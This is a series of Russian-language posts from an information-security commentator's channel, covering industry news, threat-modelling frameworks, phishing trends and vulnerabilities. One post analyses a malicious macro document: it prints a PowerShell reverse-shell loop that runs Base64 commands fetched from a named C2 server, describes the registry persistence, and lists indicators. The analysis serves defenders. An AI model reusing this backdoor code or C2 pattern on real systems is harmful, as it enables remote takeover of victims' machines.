Мда, маркетологам в забугорщине непросто приходится. Что не креатив, то потом извиняйся перед геями, лесбиянками, небинарными личностями, женщинами, афроамериканцами и афроафриканцами, коренными жителями США, католиками и протестантами, иудеями и православными... 🌈
Вот Palo Alto на DEFCON решило сделать живые торшеры, в качестве моделей для которых взяли молодых девушек 👩🏼 Еще 3-4 года назад ни у кого и мысли бы не возникло возмущаться - на выставках с преимущественно мужским контингентом полуголые грации, бодиарт, гимнастки под потолком... были в порядке вещей на всех материках, кроме, пожалуй Антарктиды 🌏 А вот тут случился облом, да такой, что генеральному директору ИБ-вендора пришлось публично извиниться перед всеми, кого обидела эта инсталляция. Или перформанс? Я все время их путаю.
А дальше ведь еще хуже будет. Точнее не креативно и скучно. Все будут бояться сделать что-то не то, что-то, что может обидеть или "тех", или "этих". А значит все будут серые и одинаковые, скучные и безликие... То ли дело у нас 😎 Правда, у нас другие проблемы.
Если вы вдруг вы, случайно, узнали, что к вам идет проверка, задача которой оценить ваш план реагирования на инциденты ✔️❌ (а у вас он должен быть согласно нормативке), а вы эту свою обязанность мягко говоря просрали, то рекомендую распечатать приведенную картинку и выдать ее за план реагирования! 💡
Во-первых, это действительно план действий, хоть и хреновый ☺️ Во-вторых, распечатка означает, что вы о задаче хотя бы думали и даже предприняли какие-то действия, а это уже лучше, чем "ну не смогла я". В-третьих, это смешно, а проверяющие тоже люди и они тоже могут посмеяться с вами и простить на первый раз! 😇
Но лучше, конечно, о плане позаботиться заранее! 😕
Видел я тут на дороге автомобильный 🚘 номер - А256ЕС. И подумал, что это, пожалуй, единственный, как мне кажется, вариант номера, который соответствует ГОСТу и имеет отношение к ИБ (256 бит ключа у алгоритма шифрования AES). Есть, конечно, варианты О152РУ (вместо 152 можно поставить и 187), но это уже больше притянуто за уши к ИБ. У американцев все-таки классная практика, когда ты за деньги можешь себе собственный автомобильный номер выбрать 🚗 Я бы себе что-нибудь ИБшное обязательно взял.
Читать полностью…У MITRE есть проект по матрице внутренних угроз, очень похожий по идеологии на MITRE ATT&CK. Но, как это ни странно, он такой далеко не единственный и нашлись желающие внести свою лепту в создание очередного фреймворка по борьбе с внутренней угрозой. При этом, это не просто "очередная матрица". В новом проекте, Insider Threat Matrix, речь идет не только о методах, используемых инсайдерами, но и о мотивах и используемых ими средствах, а также о мерах обнаружения и защиты такой внутренней активности 👺
Если MITRE ATT&CK делить атаку на 14 тактик, то в Insider Threat Matrix таких фаз всего 5:
1️⃣ Мотив. Приводится 16 различных причин, побуждающих инсайдера совершать свои черные дела (шпионаж, низкая осведомленность, персональная выгода, самосаботаж, человеческая ошибка и т.п.). Можно заметить, что в списке причин не только злонамеренные, но и случайные причины.
2️⃣ Намерение (желание). 19 различных обстоятельств, которые позволяют реализовать нарушение (наличие Bluetooth, установка ПО, печать, снимки экрана, web-доступ и т.п.).
3️⃣ Подготовка. 22 действия, осуществляемые для того, чтобы достигнуть цели по нанесению вреда (обфускация данных, архивация данных, приватный/инкогнито серфинг, чтение реестра Windows, тестирование возможности печати и т.п.).
4️⃣ Нарушение. 18 приносящих вред действия (кража, неавторизованная печать документов, выноси физического носителя, нарушение бизнес-операций, установка неразрешенного ПО и т.п.).
5️⃣ Защита от расследования (антифорензика). 16 действий для заметания следов (очистка артефактов в браузере, удаление учетной записи, удаление файлов, подмена логов, стеганография, удаление ПО и т.п.).
Кстати, о победных коммуникациях 🥳 Был у меня в практике случай, когда меня позвали провести штабные киберучения для топ-менеджеров в одну группу компаний. Я приехал обсуждать сценарии, ограничения, проверяемые болевые точки, список участников и т.п. В конце я спросил, есть ли у заказчика какие-либо вопросы и просьбы. И я их получил 😫
Заказчик в лице CISO попросил, чтобы в рамках штабных киберучений я не проверял ряд сценариев, а по итогам я должен был бы исключить все негативные моменты и показать только то, как компания отлично справляется с инцидентами ИБ ✊ На мой логичный вопрос, а в чем тогда смысл, если никто ничего не планирует менять в процессах ИБ, я получил ответ, что в бюджете киберучения заложены 🤑 и в планах на год CISO эту тему заявлял, но его руководство не любит негативных новостей ☹️ и поэтому надо построить всего лишь потемкинские деревни, а за красивой картинкой останется разруха. От таких киберучений я отказался, но сама по себе ситуация не уникальна.
Очень важно, перед началом штабных киберучений, да и любых других ИБ-проектов, задаваться двумя вопросами - "Зачем это надо делать?" и "Какого результата мы хотим/нам надо достичь?". И уже по результатам ответов принимать решение, ввязываться в эту историю или нет.
Во время штабных киберучений, которые я провожу достаточно часто, один из сценариев, которые я проверяю с участниками, - "Вам прилетело письмо от регулятора. Как вы убедитесь, что это письмо от него, а не фейк?" И надо сказать, что этот сценарий все проходят по-разному - кто-то успешно справляется с ответом и предлагает варианты взаимной аутентификации, а кто-то с удивлением задается вопросом: "А что, надо проверять письма от регулятора?".
И вот яркий пример из жизни, что да, надо проверять. Хакеры из группировки UAC-0198 от имени Службы безопасности Украины отправляли фишинговые сообщения различным государственным организациям страны, с помощью которых было заражено более 100 компьютеров вредоносом AnonVNC. О последствиях не сообщается.
Такие кейсы не новость - известны случаи фишинговых сообщения от Службы нацбезопасности Армении, от ФСТЭК, новозеландского CERT, ФинЦЕРТа и т.п. Так что если у вас еще нет соответствующего плейбука, самое время задуматься и уточнить:
❓ У почтовых доменов ваших регуляторов, включая региональные управления, включены DMARC, SPF, DKIM?
❓ У вас есть контакты сотрудников регуляторов, у которых вы можете проверить факт отправки вам сообщений или сделанных звонков?
❓ Вы знаете, как выглядят настоящие сообщения от регуляторов?
❓ Вы читали мою предыдущую заметку про плейбук для сообщений регуляторов?
Если вдруг вы ищете презентации с BlackHat и DEFCON 2024, то их есть у меня:
👨💻 BlackHat
👨💻 DEFCON
ЗЫ. Там уже бОльшая часть, но, возможно, будут еще что-то докладывать!
ЗЗЫ. Презентации и видео с PHD2 тоже недурны ☺️
Тут Денис Горчаков в VK поделился размышлениями о современных HR-практиках и отношении молодежи к работе, которые могут быть отнесены в полной мере и к ИБ. И эта запись на стене Дениса меня тригернула, расставив в моей седой голове 🧔🏼♂️ все по полочкам. Не буду переписывать все, что написал Денис, утащу только одну фразу, которая лежит в основе трудоустройства многих молодых людей:
"Я здесь за то, что хорошо умею делать, могу и буду работать над тем, что сейчас вам нужно. Я здесь потому, что по совокупности условий у вас сейчас лучшее для меня предложение, оно максимально отвечает моим интересам. А я, очевидно, наиболее остальных отвечаю вашим требованиям"
Center for Threat-Informed Defense анонсировал новый проект по описанию процесса моделирования атак на базе матрицы ATT&CK. В целом ничего нового нет - просто процесс разложили на 4 этапа и каждый подробно описали с соответствующими примерами.
Сами этапы вытекают из типовых 4 вопросов, которые обычно задаются при моделировании угроз и применяются во многих других методиках:
❓ Над чем мы работаем? На этом этапе мы описываем основные и второстепенные функции анализируемой системы и за счем декомпозиции выделяем ключевые активы системы.
❓ Что может пойти не так (что может произойти плохого)? На этом этапе мы определяем и приотизируем угрозы для активов, определенных на 1-м этапе. Причем делаем мы это не в абстрактных описаниях угроз, а в виде списка техник из матрицы MITRE ATT&CK.
❓ Что нам надо сделать с этим? Затем с помощью Mappings Explorer от CTID мы определяем защитные меры для определенных ранее техник.
❓ Мы сделали все хорошо? А тут мы тем или иным способом проверяем, что мы ничего не упустили, например, с помощью кибериспытаний.
Что мне понравилось в этой методологии, так это важный момент, когда вам надо совместить теорию и практику. Ведь если следовать, например, методике ФСТЭК, вы просто теоретизируете, опираясь на собственный опыт, как можно реализовать ту или иную угрозу. А у того же НКЦКИ или ФинЦЕРТа рассылаются просто бюллетени с индикаторами или, иногда, с техниками по ATT&CK, на базе реальных инцидентов. Но как это совместить?
Я уже несколько лет в курсе по моделированию угроз предлагаю вариант, схожий с тем, что сейчас прописал у себя CTID - сначала вы выбираете техники из реальных инцидентов, описанных в TI-бюллетенях (то, что CTID называет "доказательствами"/evidence), а потом добавляете туда уже то, что CTID называет "теорией"/theory. А затем уже оцениваете угрозы по этим двум параметрам (то, чего у меня в курсе нет).
Как-то, после принятия 250-го Указа, я разговаривал с одним замминистра, который делился тем, как он проходил обучение, необходимое для замруководителя организации по ИБ, который упоминается в Указе Президента. Так вот обучение проходил не он сам 👨🏫 - был направлен один из администраторов ИБ, который и сидел 500+ часов на курсах, пока замминистра делом занимался. И экзамен тоже проходил админ. А все потому, что поднимать действующего руководителя отдела ИБ до замминистра никто не захотел/не смог, а Указ выполнять надо. А что делать организациям, в которых вообще нет нормального ИБшника? В таких случаях помогает vCISO 🧐
В России 🇷🇺 тоже есть такие сервисы и даже отдельные эксперты предлагают такие услуги. Поэтому достаточно интересно посмотреть, что предлагают vCISO за рубежом 🌎 Интересно, что в крупных компаниях на первое место по задачам vCISO занимает проверка существующих защитных мер 🔍, в небольших - GRC и разработка стратегии ИБ, а в самых крупных - GRC, оценка зрелости ИБ 💯 и менторинг молодых ИБшников. Если сложить упомянутые востребованные сервисы, то в Топ5 надо будет добавить еще определение бюджета на ИБ 🧮
Жаль, что в России установлены требования наличия собственного руководителя ИБ в штате (и хотя Минцифры допускает шаринг ИБшника между компаниями, ФСТЭК категорически против такого подхода) - у нас просто нет достаточного количества грамотных руководителей по защите информации 🤷♂️ В итоге многие занимаются очковтирательством и назначением на эти роли людей, которые очень далеки от ИБ (но близки к топ-менеджменту) 😕 Надеюсь, когда-нибудь это требование будет отменено и тогда услуги vCISO, разумеется, с четким описанием их сферы деятельности и ответственности за результат, станут еще более востребованными чем сейчас 🥺
Предвыборный штаб Дональда Трампа подтвердил факт взлома внутренней переписки ✉️ после того, как издание Politico начали получать документы из анонимного источника. Штаб обвинил в этом “враждебные иностранные силы”, возможно, Иран 🇮🇷, ссылаясь на отчет Microsoft о фишинговой атаке на высокопоставленного сотрудника президентской кампании в июне 2024 года. Документы, включая досье на кандидата в вице-президенты Джей Ди Вэнса, были переданы анонимом, что представляет собой серьезную утечку для кампании Трампа 🇺🇸
Вспоминается история 2016-го года, когда во время президентской гонки между Дональдом Трампом и Хилари Клинтон, хакеры взломали 👨💻 у последней личный почтовый сервер и утянули всю внутреннюю переписку, включая и все "грязное белье", которое затем распространялось в СМИ и в соцсетях 🤮 Отдельные эксперты считают, что эта утечка помогла Трампу получить доли процентов голосов избирателей, которых и хватило для победы. Интересно, повторится ли ситуация сейчас?.. 👠 Что еще опубликует Politico?.. 🤔
Алиса Сабо опубликовала триптих 🙌 про управление рисками (часть первая, вторая и третья), про подмену понятий, про то, как под анализом рисков пытаются втюхать всякую дичь, про то, что ИБшники ни хрена не понимают, что такое анализ рисков на самом деле, и вот это вот все. Я жду части про оценку вероятности и ущерба ⏳
Читать полностью…Судя по тому, что сейчас пишут в каналах сопредельной страны, стоит ожидать новых фишинговых кампаний со следующими темами:
☢️ Радиационное заражение с Курской АЭС
🏃 Эвакуация Курска, Курчатова и других городов области (деньги за эвакуацию, "секретные" планы эвакуации, помощь в эвакуации и т.п.)
🏡 Сдача жилья в соседних с Курской областью городах (предоплата, сайты для поиска жилья и т.п.)
🆘 Волонтерская помощь (сайты и каналы с волонтерской помощью и т.п.)
✈️ Рост цен на авиабилеты за границу и т.п.
🔫 Мобилизация (секретные планы мобилизации и т.п.)
Как мне кажется, стоит включить эти темы в очередные занятия или расылки по повышению осведомленности, чтобы пользователи не попадались на удочку 🎣 и предупреждали и своих родных тоже; особенно если они живут и работают в Курской и сопредельных областях.
CrowdStrike под BlackHat выпустил очередной отчет по результатам своих расследований в... да, странно, выпускать летом отчет за 2024-й год, но как еще инициатору глобального коллапса отвлекать внимание от своих косяков?.. 🤔 На самом деле отчет берет интервал с 1 июля 2023 года по 30 июня 2024 года.
Для нашего региона отчет не то, чтобы интересный, все-таки он базируется на изучении техник, тактик и процедур группировок, атакующих, преимущественно США и их саттелитов 👨💻 Атаки на российские организации имеют немного иную картину, хотя анализ северокорейских и китайских группировок применим и к нам 🎃
Итак, на что обращает наше внимание CrowdStrike:
1️⃣ Интерактивных взломов (это когда хакер реально сидит в инфраструктуре жертвы и что-то там делает, а не просто заливает в нее вредоносный код, который работает по некоему алгоритму) стало на 55% больше
2️⃣ Использование средств удаленного управления выросло на 70% и в 27% всех интерактивных взломов задействованы были эти инструменты
3️⃣ Очень активна была группировка FAMOUS CHOLLIMA из Северной Кореи
4️⃣ Число атак на облачные среды выросло на 75%
5️⃣ 86% интерактивных взломов имели под собой финансовую мотивацию
6️⃣ Чаще всего атаковали технологический сектор (рост 60%). За ним идут сектор консалтинговых услуг (рост 58%), финансовые организации (25% роста), здравоохранение и ретейл. Если разделить взломы по мотивации - финансовая и таргетированная, то во втором случае в лидерах также телекоммуникационный и государственный сектора (52% и 160% роста соответственно), а в первом добавляется еще промышленность (43% роста).
7️⃣ В отчете непривычно много рекламы самих себя 🤠
Тут очередной опрос CISO подогнали, в котором задаются классические вопросы про ежегодный доход, подчиненность, управляемые функции и т.п. Но обратить внимание я хотел бы на один вопрос - "Как вы оцениваете эффективность трат на ИБ?" ⁉️
Самый популярный ответ - соответствие плана заранее определенным KPI 🤠 Такое себе, если честно. Поставил себе цели "на полшишечки", достиг их к концу года и все, в шоколаде. Бонус получил, медаль на грудь, и на следующий круг. На втором месте - снижение поверхности атаки. Вполне понятная, но тоже слишком техническая история. Третье место занимает соответствие требованиям и с небольшим отрывом от него - скорость и аккуратность реагирования на инциденты ⏳ И снова - ни один из этих показателей не имеет никакого отношения к тому, что интересно бизнесу. Отсюда и высказывание одного CFO на нашем бизнес-завтраке - "как объясняют, так и бюджет получают". И только на последнем месте в Топ5 - снижение бизнес-затрат (потерь). Странно, что нашлось 9% тех, кто оценивает свою эффективность по снижению расходов на ИБ 🤔
!!р^д**н**c 🤔
Характерным примером того, как злоумышленники используют актуальные события для распространения вредоносных программ, может послужить обнаруженный нами вредоносный документ.
Он содержит текст муниципального правового акта, который не отображается корректно, в связи с чем пользователя побуждают «Включить содержимое» и разрешить таким образом выполнение встроенного в документ макроса.
Встроенный макрос приводит документ к читаемому виду путем простой замены комбинаций символов на буквы (;; → у ; ** → o ; ?? → a
и т. д.), а также извлекает и закрепляет в автозагрузке полезную нагрузку — достаточно простой реверс-шелл — в виде PowerShell-скрипта
.
Полезная нагрузка находится в содержимом документа после строки DigitalRSASignature
и состоит из двух частей, закодированных в Base64 и разделенных строкой CHECKSUM
— <part1>CHECKSUM<part2>
, которые декодируются и записываются в файлы:
• <part1> -> %USERPROFILE%\\UserCache.ini.hta
• <part2> -> %USERPROFILE%\\UserCache.ini
UserCache.ini.hta
прописывается макросом в автозапуск Windows Explorer
через ключ реестра HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LOAD
. Назначение данного файла — запустить исполнение файла UserCache.ini
.UserCache.ini
представляет собой легковесный реверс-шелл, который использует узел 94.103.85.47
(Vdsina, Moscow) как управляющий сервер. Данный инструмент получает и выполняет набор команд с http://94.103.85.47:80/api/texts/<client_id>
, где <client_id> = <имя компьютера>_<имя пользователя>_<серийник тома жесткого диска>
.
Команды передаются в формате XML и содержат несколько атрибутов:
• CountRuns
— сколько раз нужно выполнить команду;
• Interval
— интервал ожидания в минутах между последовательными выполнениями одной команды;
• Module
— закодированная в Base64 команда.
...
try {
$Commands = [xml]$Configs;
$cycle_num = 0;
while($true){
$num_commands_completely_executed = 0;
$num_commands_executed = 0;
foreach ($CommandConfig in $Commands.Configs.Config)
{
$num_commands_executed += 1;
$quot = [int][Math]::Floor( $cycle_num / [int]$CommandConfig.Interval);
$rem = [int][Math]::Floor( $cycle_num % [int]$CommandConfig.Interval);
if($quot -lt [int]$Command.CountRuns -and $rem -eq 0){
$command_expr = FromBase64 $CommandConfig.Module;
try{
Invoke-Expression($command_expr);
}
catch {}
}
if(([int]$CommandConfig.Interval * [int]$CommandConfig.CountRuns) -lt [int]$cycle_num){
$num_commands_completely_executed += 1;
}
}
Start-Sleep 60;
if([int]$num_commands_completely_executed -eq [int]$num_commands_executed){
break;
}
$cycle_num += 1;
}
}
catch {}
...
Постановление_по_ГО_updated.doc
13252199b18d5257a60f57de95d8c6be7d7973df7f957bca8c2f31e15fcc947b
UserCache.ini.hta
e80e0b57cf3f304cb7d6dba4b0bb65da18f4d32770a3d6f3780fdab12d2617c9
UserCache.ini
ccff23a8f7c510b49264cdacf9ab6b43e9be0671670ce2eec75851920e6378b7
94.103.85.47
Проблема: сотрудники записывают свои пароли на стикеры и приклеивают их к мониторам 🖥
Способы решения:
➖ Compliance: Остановите это немедленно!
➖ Инженер ИБ: Давайте внедрим OTP!
➖ Риск-аналитик: Спрячьте стикер в ваш кошелек 👛
➖ Бизнес: Если это не приводит к катастрофическим последствиям, забейте 🤘
А вы какой вариант выберете?
Подсобрал некоторые из существующих фреймворков по угрозе от инсайдеров, индикаторам и техникам, методам обнаружения и защиты:
🔤 Insider Threat TTP Knowledge Base v2.0.0 (писал про него)
🔤 Insider Threat Matrix (малость подзаброшен)
🔤 Insider Threat Matrix (описан выше)
🔤 Common Sense Guide to Mitigating Insider Threats, Seventh Edition
🔤 FBI: The Insider Threat: An introduction to detecting and deterring an insider spy (больше фокусируется на различных индикаторах)
🔤 National Insider Threat Task Force (NITTF) от Национальной разведки США
🔤 Insider Attack Matrix
🔤 Insider Risk Management Program Evaluation (переложение NIST CSF на борьбу с инсайдерами от CISA)
Риэлторы-мошенники "развели" Ларису Долину на 130 миллионов рублей!.. 🤑 Да, это реальность! 40 миллионов, 130 миллионов, 27 миллионов, 60 миллионов, 43 миллиона... Суммы, которые получают мошенники 💻 измеряются уже десятками миллионов, что даже по международным меркам в топе. В США кибермошенничество с недвижимостью тоже на первом месте по объему хищений, но там суммы все-таки поменьше, обычно несколько сотен тысяч долларов, до полумиллиона 💸
Читать полностью…Знаете, в Cisco была такая практика, когда раз в квартал, какой-нибудь босс писал на всю компанию письмо ✍️ про то, какие мы все молодцы (даже если нет) и как у нас все хорошо (даже если нет) и мы скоро всех порвем (даже если нет). Во время COVID-19 такие письма сменили тональность и топ-менеджеры разного уровня стали в них писать о чем-то простом и понятном, рефлексируя 😭 публично и показывая всем, кто находится в непростой ситуации, что все в одной лодке. Схожая история была, когда в мире происходила какая-нибудь катастрофа или авария. Уже не знаю, были ли такие письма от души или по разнарядке, но создавалось впечатление, что руководство всегда на связи и всегда в курсе всего происходящего. А самое главное, что оно не бросает вас на произвол судьбы 🆘
И вот смотрю я на коммуникации в Курской области своим непрофессиональным взглядом, оцениваю то, что пишут официальные каналы руководителей разных населенных пунктов и субъектов, что пишут СМИ, что пишут в народных каналах... И понимаю, что чиновники не умеют в кризисные коммуникации от слова совсем ☹️ И PR-службы у них отвыкли от правильных коммуникаций, привыкнув только к победным реляциям 🥇 А жители не знают, куда бежать и кого слушать. Утром - "эвакуируйся", днем "все нормально", вечером "немедленно у*бывайте", а ночью "прежнее сообщение считать недействительным". Отсюда паника и очередные потоки брани в адрес руководства... 😫
К чему это я? Да к тому, что в управлении инцидентами, часть связанная с коммуникациями очень важна. Иногда даже важнее всего остального. А иначе люди будут попадаться на "фейковых боссов", "вам звонит мэр", "вам единовременная выплата от президента", "спасите свои средства, переведя их на резервный счет", "установите ПО для удаленной техподдержки"... В условиях выстроенных коммуникаций, мы начинаем додумывать и... совершать ошибки, чем и пользуются плохие парни в мире физическом и виртуальном.
Представьте, что вам предлагают через год возглавить ИБ-службу компании вашей мечты с подчинением генеральному директору 🧐 Рост зарплаты 10х, персональный помощник, большой кабинет с диванчиком с видом на парк, любые ИБ-«игрушки»… 🤑 Но при этом вы должны будете упахаться в течение года, чтобы получить знания и навыки, нужные для работы. Вы не сможете в течение года ездить в отпуск, встречаться с друзьями, ходить на выставки, в кино и рестораны. У вас даже не будет нормальных выходных. Все ваше время будет уходить на учебу 😫
Читать полностью…Когда участники "хакерских" конференций жалуются, что персонал отелей их гнобит, не любит, шмонает и т.п., они должны понимать, что они [участники] для персонала и есть угроза 👮 Такая же, как вредоносы, DDoS, RCE и т.п. - угрозы для ИБшников. И десятких фейковых точек доступа в отеле, неработающие банкоматы, взломанные системы цифрового контента, включающаяся ночью сигнализация - это проблема для других проживающих, коим не повезло снять номер в те же даты, что и BlackHat/DEFCON, а также и для самих отелей. У всех своя модель угроз 🤔
Читать полностью…Center for Threat-Informed Defense обновил свой проект Top ATT&CK Techniques, выпустив вторую версию спустя 2 года после первой. Концепция проекта не поменялась - вы задаете ряд условий применительно к вашей организации и "калькулятор" выдает вам ваш собственный Топ10, а не тот, который вам навязывают внешние компании, собирающие данные, как правило, с множества своих средств защиты (да, они видят картину шире, но могут не учитывать то, что актуально именно для вас).
Какие-то кардинальные изменения в проекте заметить сложно, но они есть. Используется версия матрицы 14.1 (правда, текущая сейчас уже 15.1), улучшили графический интерфейс. Также проект представляет пример Топ10 применительно к шифровальщикам - этот список составлялся экспертами CTID. Они, правда, обещали, что выпустят и другие Топ10, но пока кроме Ransomware Top10 Techniques ничего нет. Но и ждать чего-то совсем нового не стоит - все-таки основная логика у него под капотом и его надо просто использовать для составления списка основных техник и методов защиты от них.
Вот так объявляют творческий конкурс по ИБ - накреативить что-то, написать статью, мемасики выдумать и всякое такое. Призы солидные - дроны, айфоны, планшеты и даже ноутбуки. И ты весь такой креативный и писучий приходишь, участвуешь и... не выигрываешь 😭
Жюри решает, что Лукацкий не может наравне со всеми участвовать и надо его в отдельную категорию выделить, поощрить спецпризом и пусть идет отсюда и не мешает молодежи развивать свое творческое начало и демонстрировать креатив 🎨 Пусть не отнимает надежду и не отбивает охоту творить. А то, ишь, заполонил все вокруг... 🖕 И ты уходишь с утешительным призом заливать его в одиночестве коньяком 🍷 Не надо быть как Лукацкий, я тут сам как-нибудь...
Как вы можете быть консультантом и хотеть получать большие деньги, если у вас нет своего фреймворка или какой-нибудь модели?! Никак. Вот и в Accenture подумали также 💡 и разработали модель оценки зрелости вымогателей (Extortion Group Maturity Model, EGMM) 😷 , которую предлагается использовать как аналитический инструмент, помогающий оценить достоверность, стабильность и ожидаемое поведение активных программ-вымогателей и группировок. Правильное применение модели может помочь лицам, принимающим решения, судить о том, должны ли они взаимодействовать (и как) с вымогателями, а также указать на ожидаемое поведение группировки 🤝
EGMM помогает организациям оценить предсказуемость и стабильность группы угроз на основе 1️⃣9️⃣ уникальных параметров, которые затем используются для размещения группы на диаграмме рассеяния по двум осям - стабильность и предсказуемость, что дает попадание в один из 4 квадрантов: от хаотического поведения до стабильного и от предсказуемого до ненадежного 🤔
Все хорошо в этой идее кроме одного - ежемесячно появляется около 30 новых семейств шифровальщиков; кто будет оценивать каждое из семейств и стоящих за ними группировок по EGMM? Получается, что надо иметь в своем составе команду Threat Intelligence, которая и будет заниматься этим? Не все смогут...
Раз уж дал комментарий для радио, то чего пропадать контенту. Специалисты обнаружили уязвимость 18-летней давности, которая угрожает компьютерам под Linux 😁 и macOS 📱, на которых запущены браузеры Chrome 📱, Chromium, Firefox 📱 и Safari 📱. Уязвимость, названная "0.0.0.0-Day", позволяет вредоносным сайтам слать JavaScript-запросы 📱 к локальному адресу 0.0.0.0, а уязвимый браузер будет пересылать их на определенные локальные сервисы на компьютеры, что позволит злоумышленникам красть информацию, изменять настройки ПО, загружать вредоносный код и даже удаленно исполнять код.
На Windows данной проблемы нет, так как она блокирует такие внешние запросы к локальному IP. Разработчики браузеров сейчас в процессе исправления данной уязвимости: 👨💻
➖ Google пообещала устранить этот баг в 128 версии Chromium (сейчас в бете) и закончить его к 133 версии Chrome.
➖ Apple внесет изменения в очередную версию движка WebKit и в новом обновлении macOS она должна быть доставлена до пользователей
➖ Mozilla в процессе решения данной проблемы, но когда это будет сделано не сообщается.
Процент web-сайтов, которые коммуницируют с локальным адресов 0.0.0.0 растет и сейчас составляет 0,015% от общего числа сайтов в Интернет, то есть всего около 100 тысяч web-ресурсов (с июня начался экспоненциальный рост).
Помните американскую компанию Johnson Controls, которую взломали 🧑💻 в прошлом сентябре, утянули много данных и потребовали выкуп в 50 миллионов долларов? Так вот тут на днях в ее видеокамерах, а она выпускает много всего промышленного, нашли 6 уязвимостей, которые позволяли хакерам получать доступ к видеосистемам и перехватывать видеопоток от уязвимых промышленных камер 🏭
А в Telegram-каналах вчера писали, что ВСУ получили доступ к видеокамерам, расположенным вдоль дорог 🛣 в Курской области, отслеживая перемещение российских войск в рамках контртеррористической операции. Самое интересное, что инструкции по взлому камер видеонаблюдения давно выложены на хакерских проукраинских сайтах. Ровно тот же способ применялся в начале конфликта Израиля и ХАМАС 🇮🇱
А групп в соцсетях, которые торгуют доступами к камерам видеонаблюдения в квартирах, фитнес-центрах, медкабинетах, борделях, загородных домах и т.п., вагон и маленькая тележка 🔞 И существуют они уже не первый год и с ними никто особо не борется. Но самое главное, что они показывают проблему, которая существует, - влияние хакеров на мир физический. И одно дело, когда кто-то наблюдает когда ты ковыряешься в носу, и совсем другое - когда данные перемещения войск сливают противнику, который потом бомбит колонну 🧨
То есть это тема-то не новая, но почему-то на нее мало кто обращает внимание. Видеокамеры и системы управления ими вообще могут не относится ни к ГИС, ни к КИИ, а значит и защищать их необязательно. И вот результат... 💥
Американская ипотечная компания LoanDepot, столкнувшаяся в январе с атакой со стороны Alphv/BlackCat, зашифровавших данные 16 миллионов пользователей, объявила о потерях в 42 миллиона долларов (около 1️⃣0️⃣🔣 всего полугодового оборота компании ❗️), которые включают в себя стоимость расследования и восстановления, стоимость уведомления клиентов об инциденте, стоимость консалтинга, судебные разбирательства и т.п. Также компанию ожидает групповой иск в размере 25 миллионов долларов 🤑
ЗЫ. Alphv/BlackCat объявили, что сейчас в процессе продажи украденных ипотечных данных 😾
Очередной конкурс ИБ-стартапов, на этот раз на BlackHat (BlackHat Startup Spotlight). Чем-то напоминает аналогичный конкурс на RSA Conference, но он другой 😊 В этом году финалистами стали 4 компании:
🔤 RAD Security - поведенческий мониторинг безопасности облаков и реагирование на выявленные инциденты (она же была финалистом конкурса и на RSAC)
🔤 DryRun Security - базирующаяся на ИИ защита для разработчиков, пользующихся GitHub
🔤 Knostic - контроль доступа к LLM для предотвращения передачи конфиденциальной информации
🔤 LeakSignal - классификация и защита в реальном времени конфиденциальных данных в процессе передачи
ЗЫ. Победил Knostic 🏆
Open-source инструмент D.I.A.N.A. на базе ИИ 🧠 - скармливаешь ему TI-отчеты с описанием TTP, даешь фрагменты логов и просишь написать детекты на нужном языке или в нужном формате. И вуаля... Мечта ИБшника... Правда, автор отмечает, что все хорошо работает только при условии хорошего "промпта", то есть описания TTP и логов. А без этого все как всегда - "на входе шлак и на выходе шлак" 🗑
ЗЫ. А вы и есть за меня будете?.. (с)
ЗЗЫ. Не путать с вредоносным фреймворком DIANA для обхода EDR, который сегодня поступил в продажу на черном рынке.